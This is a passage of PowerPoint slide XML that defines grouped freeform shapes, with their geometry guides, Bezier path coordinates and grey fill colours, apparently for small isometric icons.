                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4142FFC9-9F0A-40AE-BA32-6DDFD663DC6D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flipH="1">
                  <a:off x="1257" y="2479"/>
                  <a:ext cx="270" cy="209"/>
                  <a:chOff x="2155" y="1811"/>
                  <a:chExt cx="675" cy="523"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="1971" name="Freeform 1071">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{376E2549-BA90-4652-B325-0B55A48D300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490" y="1818"/>
                    <a:ext cx="314" cy="433"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 4460"/>
                      <a:gd name="T1" fmla="*/ 0 h 6160"/>
                      <a:gd name="T2" fmla="*/ 0 w 4460"/>
                      <a:gd name="T3" fmla="*/ 4972 h 6160"/>
                      <a:gd name="T4" fmla="*/ 4460 w 4460"/>
                      <a:gd name="T5" fmla="*/ 6160 h 6160"/>
                      <a:gd name="T6" fmla="*/ 4460 w 4460"/>
                      <a:gd name="T7" fmla="*/ 1188 h 6160"/>
                      <a:gd name="T8" fmla="*/ 0 w 4460"/>
                      <a:gd name="T9" fmla="*/ 0 h 61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460" h="6160">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="4972"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4460" y="6160"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4460" y="118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969696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2" name="Freeform 1072">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{091E8522-46CC-40E4-B369-2799F49C094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513" y="1850"/>
                    <a:ext cx="268" cy="332"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 3803"/>
                      <a:gd name="T1" fmla="*/ 0 h 4725"/>
                      <a:gd name="T2" fmla="*/ 0 w 3803"/>
                      <a:gd name="T3" fmla="*/ 3711 h 4725"/>
                      <a:gd name="T4" fmla="*/ 3803 w 3803"/>
                      <a:gd name="T5" fmla="*/ 4725 h 4725"/>
                      <a:gd name="T6" fmla="*/ 3803 w 3803"/>
                      <a:gd name="T7" fmla="*/ 1014 h 4725"/>
                      <a:gd name="T8" fmla="*/ 0 w 3803"/>
                      <a:gd name="T9" fmla="*/ 0 h 47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03" h="4725">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="3711"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="3803" y="4725"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="3803" y="101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3" name="Freeform 1073">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C321471C-D0E3-40AE-992A-03D1F6452FF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490" y="1811"/>
                    <a:ext cx="340" cy="90"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 4831 w 4831"/>
                      <a:gd name="T1" fmla="*/ 1189 h 1288"/>
                      <a:gd name="T2" fmla="*/ 4460 w 4831"/>
                      <a:gd name="T3" fmla="*/ 1288 h 1288"/>
                      <a:gd name="T4" fmla="*/ 0 w 4831"/>
                      <a:gd name="T5" fmla="*/ 100 h 1288"/>
                      <a:gd name="T6" fmla="*/ 368 w 4831"/>
                      <a:gd name="T7" fmla="*/ 0 h 1288"/>
                      <a:gd name="T8" fmla="*/ 4831 w 4831"/>
                      <a:gd name="T9" fmla="*/ 1189 h 1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31" h="1288">
                        <a:moveTo>
                          <a:pt x="4831" y="1189"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="4460" y="1288"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="100"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="368" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4831" y="1189"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="B2B2B2"/>
                  </a:solidFill>
                  <a:ln w="6350" cap="flat" cmpd="sng">
                    <a:solidFill>
                      <a:srgbClr val="B2B2B2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4" name="Freeform 1074">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE644F4D-832F-4DE3-BF14-E7F949D1823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155" y="2127"/>
                    <a:ext cx="675" cy="181"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 9603"/>
                      <a:gd name="T1" fmla="*/ 1287 h 2577"/>
                      <a:gd name="T2" fmla="*/ 4802 w 9603"/>
                      <a:gd name="T3" fmla="*/ 0 h 2577"/>
                      <a:gd name="T4" fmla="*/ 9603 w 9603"/>
                      <a:gd name="T5" fmla="*/ 1287 h 2577"/>
                      <a:gd name="T6" fmla="*/ 4802 w 9603"/>
                      <a:gd name="T7" fmla="*/ 2577 h 2577"/>
                      <a:gd name="T8" fmla="*/ 0 w 9603"/>
                      <a:gd name="T9" fmla="*/ 1287 h 25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603" h="2577">
                        <a:moveTo>
                          <a:pt x="0" y="1287"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="4802" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="9603" y="1287"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4802" y="2577"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="1287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969696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5" name="Freeform 1075">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3BBA8B8-0B16-42B7-A7B3-30EFA23EAE7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493" y="2218"/>
                    <a:ext cx="337" cy="116"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 4801"/>
                      <a:gd name="T1" fmla="*/ 1290 h 1656"/>
                      <a:gd name="T2" fmla="*/ 0 w 4801"/>
                      <a:gd name="T3" fmla="*/ 1656 h 1656"/>
                      <a:gd name="T4" fmla="*/ 4801 w 4801"/>
                      <a:gd name="T5" fmla="*/ 369 h 1656"/>
                      <a:gd name="T6" fmla="*/ 4801 w 4801"/>
                      <a:gd name="T7" fmla="*/ 0 h 1656"/>
                      <a:gd name="T8" fmla="*/ 0 w 4801"/>
                      <a:gd name="T9" fmla="*/ 1290 h 16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01" h="1656">
                        <a:moveTo>
                          <a:pt x="0" y="1290"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="1656"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4801" y="369"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4801" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="1290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C0C0C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6" name="Freeform 1076">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFA3B07C-8E68-44CD-B881-E0F45EEAF45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155" y="2218"/>
                    <a:ext cx="338" cy="116"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 4802 w 4802"/>
                      <a:gd name="T1" fmla="*/ 1656 h 1656"/>
                      <a:gd name="T2" fmla="*/ 0 w 4802"/>
                      <a:gd name="T3" fmla="*/ 369 h 1656"/>
                      <a:gd name="T4" fmla="*/ 0 w 4802"/>
                      <a:gd name="T5" fmla="*/ 0 h 1656"/>
                      <a:gd name="T6" fmla="*/ 4802 w 4802"/>
                      <a:gd name="T7" fmla="*/ 1290 h 1656"/>
                      <a:gd name="T8" fmla="*/ 4802 w 4802"/>
                      <a:gd name="T9" fmla="*/ 1656 h 16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02" h="1656">
                        <a:moveTo>
                          <a:pt x="4802" y="1656"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="369"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4802" y="1290"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4802" y="1656"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="B2B2B2"/>
                  </a:solidFill>
                  <a:ln w="6350" cap="flat" cmpd="sng">
                    <a:solidFill>
                      <a:srgbClr val="B2B2B2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7" name="Freeform 1077">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{820F4754-7835-4F1C-B581-2B35A7FBEAB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251" y="2157"/>
                    <a:ext cx="457" cy="122"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 6492"/>
                      <a:gd name="T1" fmla="*/ 654 h 1743"/>
                      <a:gd name="T2" fmla="*/ 4061 w 6492"/>
                      <a:gd name="T3" fmla="*/ 1743 h 1743"/>
                      <a:gd name="T4" fmla="*/ 6492 w 6492"/>
                      <a:gd name="T5" fmla="*/ 1091 h 1743"/>
                      <a:gd name="T6" fmla="*/ 2431 w 6492"/>
                      <a:gd name="T7" fmla="*/ 0 h 1743"/>
                      <a:gd name="T8" fmla="*/ 0 w 6492"/>
                      <a:gd name="T9" fmla="*/ 654 h 17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492" h="1743">
                        <a:moveTo>
                          <a:pt x="0" y="654"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="4061" y="1743"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="6492" y="1091"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="2431" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="654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C0C0C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8" name="Freeform 1078">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{154D404C-25C6-4721-BBAB-C0A1528FA5A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804" y="1894"/>
                    <a:ext cx="26" cy="357"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 371"/>
                      <a:gd name="T1" fmla="*/ 5071 h 5071"/>
                      <a:gd name="T2" fmla="*/ 371 w 371"/>
                      <a:gd name="T3" fmla="*/ 4972 h 5071"/>
                      <a:gd name="T4" fmla="*/ 371 w 371"/>
                      <a:gd name="T5" fmla="*/ 0 h 5071"/>
                      <a:gd name="T6" fmla="*/ 0 w 371"/>
                      <a:gd name="T7" fmla="*/ 99 h 5071"/>
                      <a:gd name="T8" fmla="*/ 0 w 371"/>
                      <a:gd name="T9" fmla="*/ 5071 h 50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71" h="5071">
                        <a:moveTo>
                          <a:pt x="0" y="5071"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="371" y="4972"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="371" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="99"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="5071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C0C0C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65" name="Group 1079">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{683C4B71-0F22-460E-A039-D72502776BD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430" y="2451"/>
                  <a:ext cx="314" cy="485"/>
                  <a:chOff x="2257" y="2736"/>
                  <a:chExt cx="314" cy="485"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="1966" name="Freeform 1080">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F222A85-C08B-4138-97F1-3BA13D4CF9A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 flipH="1">
                    <a:off x="2337" y="3027"/>
                    <a:ext cx="132" cy="173"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 108 w 108"/>
                      <a:gd name="T1" fmla="*/ 36 h 140"/>
                      <a:gd name="T2" fmla="*/ 108 w 108"/>
                      <a:gd name="T3" fmla="*/ 35 h 140"/>
                      <a:gd name="T4" fmla="*/ 108 w 108"/>
                      <a:gd name="T5" fmla="*/ 28 h 140"/>
                      <a:gd name="T6" fmla="*/ 108 w 108"/>
                      <a:gd name="T7" fmla="*/ 23 h 140"/>
                      <a:gd name="T8" fmla="*/ 108 w 108"/>
                      <a:gd name="T9" fmla="*/ 22 h 140"/>
                      <a:gd name="T10" fmla="*/ 108 w 108"/>
                      <a:gd name="T11" fmla="*/ 17 h 140"/>
                      <a:gd name="T12" fmla="*/ 108 w 108"/>
                      <a:gd name="T13" fmla="*/ 16 h 140"/>
                      <a:gd name="T14" fmla="*/ 108 w 108"/>
                      <a:gd name="T15" fmla="*/ 16 h 140"/>
                      <a:gd name="T16" fmla="*/ 89 w 108"/>
                      <a:gd name="T17" fmla="*/ 7 h 140"/>
                      <a:gd name="T18" fmla="*/ 64 w 108"/>
                      <a:gd name="T19" fmla="*/ 2 h 140"/>
                      <a:gd name="T20" fmla="*/ 57 w 108"/>
                      <a:gd name="T21" fmla="*/ 4 h 140"/>
                      <a:gd name="T22" fmla="*/ 49 w 108"/>
                      <a:gd name="T23" fmla="*/ 6 h 140"/>
                      <a:gd name="T24" fmla="*/ 49 w 108"/>
                      <a:gd name="T25" fmla="*/ 6 h 140"/>
                      <a:gd name="T26" fmla="*/ 0 w 108"/>
                      <a:gd name="T27" fmla="*/ 18 h 140"/>
                      <a:gd name="T28" fmla="*/ 29 w 108"/>
                      <a:gd name="T29" fmla="*/ 47 h 140"/>
                      <a:gd name="T30" fmla="*/ 62 w 108"/>
                      <a:gd name="T31" fmla="*/ 40 h 140"/>
                      <a:gd name="T32" fmla="*/ 62 w 108"/>
                      <a:gd name="T33" fmla="*/ 118 h 140"/>
                      <a:gd name="T34" fmla="*/ 101 w 108"/>
                      <a:gd name="T35" fmla="*/ 129 h 140"/>
                      <a:gd name="T36" fmla="*/ 108 w 108"/>
                      <a:gd name="T37" fmla="*/ 117 h 140"/>
                      <a:gd name="T38" fmla="*/ 108 w 108"/>
                      <a:gd name="T39" fmla="*/ 36 h 1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08" h="140">
                        <a:moveTo>
                          <a:pt x="108" y="36"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="36"/>
                          <a:pt x="108" y="36"/>
                          <a:pt x="108" y="35"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="33"/>
                          <a:pt x="108" y="30"/>
                          <a:pt x="108" y="28"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="28"/>
                          <a:pt x="108" y="26"/>
                          <a:pt x="108" y="23"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="23"/>
                          <a:pt x="108" y="22"/>
                          <a:pt x="108" y="22"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="21"/>
                          <a:pt x="108" y="19"/>
                          <a:pt x="108" y="17"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="17"/>
                          <a:pt x="108" y="17"/>
                          <a:pt x="108" y="16"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="16"/>
                          <a:pt x="108" y="16"/>
                          <a:pt x="108" y="16"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="105" y="4"/>
                          <a:pt x="95" y="8"/>
                          <a:pt x="89" y="7"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="85" y="6"/>
                          <a:pt x="73" y="0"/>
                          <a:pt x="64" y="2"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="60" y="3"/>
                          <a:pt x="57" y="4"/>
                          <a:pt x="57" y="4"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="49" y="6"/>
                          <a:pt x="49" y="6"/>
                          <a:pt x="49" y="6"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="49" y="6"/>
                          <a:pt x="49" y="6"/>
                          <a:pt x="49" y="6"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="18"/>
                          <a:pt x="0" y="18"/>
                          <a:pt x="0" y="18"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="29" y="47"/>
                          <a:pt x="29" y="47"/>
                          <a:pt x="29" y="47"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="62" y="40"/>
                          <a:pt x="62" y="40"/>
                          <a:pt x="62" y="40"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="62" y="67"/>
                          <a:pt x="62" y="109"/>
                          <a:pt x="62" y="118"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="63" y="138"/>
                          <a:pt x="89" y="140"/>
                          <a:pt x="101" y="129"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="105" y="126"/>
                          <a:pt x="108" y="122"/>
                          <a:pt x="108" y="117"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="101"/>
                          <a:pt x="107" y="69"/>
                          <a:pt x="108" y="3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74118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7" name="Freeform 1081">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FF572B7-3FD3-4FC3-8BA1-2279D18534F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 flipH="1">
                    <a:off x="2276" y="3014"/>
                    <a:ext cx="245" cy="207"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 196 w 197"/>
                      <a:gd name="T1" fmla="*/ 44 h 167"/>
                      <a:gd name="T2" fmla="*/ 196 w 197"/>
                      <a:gd name="T3" fmla="*/ 37 h 167"/>
                      <a:gd name="T4" fmla="*/ 177 w 197"/>
                      <a:gd name="T5" fmla="*/ 18 h 167"/>
                      <a:gd name="T6" fmla="*/ 137 w 197"/>
                      <a:gd name="T7" fmla="*/ 25 h 167"/>
                      <a:gd name="T8" fmla="*/ 99 w 197"/>
                      <a:gd name="T9" fmla="*/ 35 h 167"/>
                      <a:gd name="T10" fmla="*/ 99 w 197"/>
                      <a:gd name="T11" fmla="*/ 52 h 167"/>
                      <a:gd name="T12" fmla="*/ 99 w 197"/>
                      <a:gd name="T13" fmla="*/ 35 h 167"/>
                      <a:gd name="T14" fmla="*/ 99 w 197"/>
                      <a:gd name="T15" fmla="*/ 35 h 167"/>
                      <a:gd name="T16" fmla="*/ 99 w 197"/>
                      <a:gd name="T17" fmla="*/ 2 h 167"/>
                      <a:gd name="T18" fmla="*/ 89 w 197"/>
                      <a:gd name="T19" fmla="*/ 14 h 167"/>
                      <a:gd name="T20" fmla="*/ 2 w 197"/>
                      <a:gd name="T21" fmla="*/ 8 h 167"/>
                      <a:gd name="T22" fmla="*/ 2 w 197"/>
                      <a:gd name="T23" fmla="*/ 10 h 167"/>
                      <a:gd name="T24" fmla="*/ 2 w 197"/>
                      <a:gd name="T25" fmla="*/ 31 h 167"/>
                      <a:gd name="T26" fmla="*/ 12 w 197"/>
                      <a:gd name="T27" fmla="*/ 67 h 167"/>
                      <a:gd name="T28" fmla="*/ 70 w 197"/>
                      <a:gd name="T29" fmla="*/ 83 h 167"/>
                      <a:gd name="T30" fmla="*/ 83 w 197"/>
                      <a:gd name="T31" fmla="*/ 82 h 167"/>
                      <a:gd name="T32" fmla="*/ 149 w 197"/>
                      <a:gd name="T33" fmla="*/ 65 h 167"/>
                      <a:gd name="T34" fmla="*/ 150 w 197"/>
                      <a:gd name="T35" fmla="*/ 137 h 167"/>
                      <a:gd name="T36" fmla="*/ 150 w 197"/>
                      <a:gd name="T37" fmla="*/ 141 h 167"/>
                      <a:gd name="T38" fmla="*/ 197 w 197"/>
                      <a:gd name="T39" fmla="*/ 140 h 167"/>
                      <a:gd name="T40" fmla="*/ 196 w 197"/>
                      <a:gd name="T41" fmla="*/ 44 h 1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97" h="167">
                        <a:moveTo>
                          <a:pt x="196" y="44"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="196" y="44"/>
                          <a:pt x="196" y="40"/>
                          <a:pt x="196" y="37"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="193" y="23"/>
                          <a:pt x="183" y="19"/>
                          <a:pt x="177" y="18"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="168" y="17"/>
                          <a:pt x="137" y="25"/>
                          <a:pt x="137" y="25"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="99" y="35"/>
                          <a:pt x="99" y="35"/>
                          <a:pt x="99" y="35"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="99" y="52"/>
                          <a:pt x="99" y="52"/>
                          <a:pt x="99" y="52"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="99" y="35"/>
                          <a:pt x="99" y="35"/>
                          <a:pt x="99" y="35"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="99" y="35"/>
                          <a:pt x="99" y="35"/>
                          <a:pt x="99" y="35"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="99" y="20"/>
                          <a:pt x="99" y="4"/>
                          <a:pt x="99" y="2"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="98" y="8"/>
                          <a:pt x="95" y="13"/>
                          <a:pt x="89" y="14"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="80" y="16"/>
                          <a:pt x="0" y="0"/>
                          <a:pt x="2" y="8"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="9"/>
                          <a:pt x="2" y="9"/>
                          <a:pt x="2" y="10"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="31"/>
                          <a:pt x="2" y="31"/>
                          <a:pt x="2" y="31"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="55"/>
                          <a:pt x="0" y="64"/>
                          <a:pt x="12" y="67"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="18" y="69"/>
                          <a:pt x="66" y="82"/>
                          <a:pt x="70" y="83"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="73" y="83"/>
                          <a:pt x="78" y="84"/>
                          <a:pt x="83" y="82"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="97" y="78"/>
                          <a:pt x="127" y="71"/>
                          <a:pt x="149" y="65"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="150" y="137"/>
                          <a:pt x="150" y="137"/>
                          <a:pt x="150" y="137"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="150" y="138"/>
                          <a:pt x="150" y="140"/>
                          <a:pt x="150" y="141"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="151" y="167"/>
                          <a:pt x="196" y="163"/>
                          <a:pt x="197" y="140"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="196" y="125"/>
                          <a:pt x="196" y="60"/>
                          <a:pt x="196" y="44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74118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8" name="Freeform 1082">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{614D6B81-9CDD-48BB-8FD0-75F1E8A289D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 flipH="1">
                    <a:off x="2257" y="2825"/>
                    <a:ext cx="314" cy="247"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 209 w 254"/>
                      <a:gd name="T1" fmla="*/ 119 h 200"/>
                      <a:gd name="T2" fmla="*/ 184 w 254"/>
                      <a:gd name="T3" fmla="*/ 127 h 200"/>
                      <a:gd name="T4" fmla="*/ 173 w 254"/>
                      <a:gd name="T5" fmla="*/ 55 h 200"/>
                      <a:gd name="T6" fmla="*/ 144 w 254"/>
                      <a:gd name="T7" fmla="*/ 27 h 200"/>
                      <a:gd name="T8" fmla="*/ 96 w 254"/>
                      <a:gd name="T9" fmla="*/ 14 h 200"/>
                      <a:gd name="T10" fmla="*/ 51 w 254"/>
                      <a:gd name="T11" fmla="*/ 2 h 200"/>
                      <a:gd name="T12" fmla="*/ 18 w 254"/>
                      <a:gd name="T13" fmla="*/ 13 h 200"/>
                      <a:gd name="T14" fmla="*/ 3 w 254"/>
                      <a:gd name="T15" fmla="*/ 96 h 200"/>
                      <a:gd name="T16" fmla="*/ 3 w 254"/>
                      <a:gd name="T17" fmla="*/ 96 h 200"/>
                      <a:gd name="T18" fmla="*/ 2 w 254"/>
                      <a:gd name="T19" fmla="*/ 99 h 200"/>
                      <a:gd name="T20" fmla="*/ 2 w 254"/>
                      <a:gd name="T21" fmla="*/ 99 h 200"/>
                      <a:gd name="T22" fmla="*/ 9 w 254"/>
                      <a:gd name="T23" fmla="*/ 118 h 200"/>
                      <a:gd name="T24" fmla="*/ 26 w 254"/>
                      <a:gd name="T25" fmla="*/ 119 h 200"/>
                      <a:gd name="T26" fmla="*/ 33 w 254"/>
                      <a:gd name="T27" fmla="*/ 117 h 200"/>
                      <a:gd name="T28" fmla="*/ 33 w 254"/>
                      <a:gd name="T29" fmla="*/ 117 h 200"/>
                      <a:gd name="T30" fmla="*/ 36 w 254"/>
                      <a:gd name="T31" fmla="*/ 116 h 200"/>
                      <a:gd name="T32" fmla="*/ 43 w 254"/>
                      <a:gd name="T33" fmla="*/ 114 h 200"/>
                      <a:gd name="T34" fmla="*/ 44 w 254"/>
                      <a:gd name="T35" fmla="*/ 76 h 200"/>
                      <a:gd name="T36" fmla="*/ 41 w 254"/>
                      <a:gd name="T37" fmla="*/ 77 h 200"/>
                      <a:gd name="T38" fmla="*/ 44 w 254"/>
                      <a:gd name="T39" fmla="*/ 53 h 200"/>
                      <a:gd name="T40" fmla="*/ 43 w 254"/>
                      <a:gd name="T41" fmla="*/ 171 h 200"/>
                      <a:gd name="T42" fmla="*/ 53 w 254"/>
                      <a:gd name="T43" fmla="*/ 183 h 200"/>
                      <a:gd name="T44" fmla="*/ 111 w 254"/>
                      <a:gd name="T45" fmla="*/ 199 h 200"/>
                      <a:gd name="T46" fmla="*/ 140 w 254"/>
                      <a:gd name="T47" fmla="*/ 177 h 200"/>
                      <a:gd name="T48" fmla="*/ 140 w 254"/>
                      <a:gd name="T49" fmla="*/ 171 h 200"/>
                      <a:gd name="T50" fmla="*/ 140 w 254"/>
                      <a:gd name="T51" fmla="*/ 139 h 200"/>
                      <a:gd name="T52" fmla="*/ 139 w 254"/>
                      <a:gd name="T53" fmla="*/ 98 h 200"/>
                      <a:gd name="T54" fmla="*/ 137 w 254"/>
                      <a:gd name="T55" fmla="*/ 84 h 200"/>
                      <a:gd name="T56" fmla="*/ 136 w 254"/>
                      <a:gd name="T57" fmla="*/ 79 h 200"/>
                      <a:gd name="T58" fmla="*/ 137 w 254"/>
                      <a:gd name="T59" fmla="*/ 84 h 200"/>
                      <a:gd name="T60" fmla="*/ 139 w 254"/>
                      <a:gd name="T61" fmla="*/ 98 h 200"/>
                      <a:gd name="T62" fmla="*/ 145 w 254"/>
                      <a:gd name="T63" fmla="*/ 136 h 200"/>
                      <a:gd name="T64" fmla="*/ 145 w 254"/>
                      <a:gd name="T65" fmla="*/ 137 h 200"/>
                      <a:gd name="T66" fmla="*/ 145 w 254"/>
                      <a:gd name="T67" fmla="*/ 137 h 200"/>
                      <a:gd name="T68" fmla="*/ 145 w 254"/>
                      <a:gd name="T69" fmla="*/ 142 h 200"/>
                      <a:gd name="T70" fmla="*/ 155 w 254"/>
                      <a:gd name="T71" fmla="*/ 165 h 200"/>
                      <a:gd name="T72" fmla="*/ 170 w 254"/>
                      <a:gd name="T73" fmla="*/ 171 h 200"/>
                      <a:gd name="T74" fmla="*/ 223 w 254"/>
                      <a:gd name="T75" fmla="*/ 155 h 200"/>
                      <a:gd name="T76" fmla="*/ 209 w 254"/>
                      <a:gd name="T77" fmla="*/ 119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254" h="200">
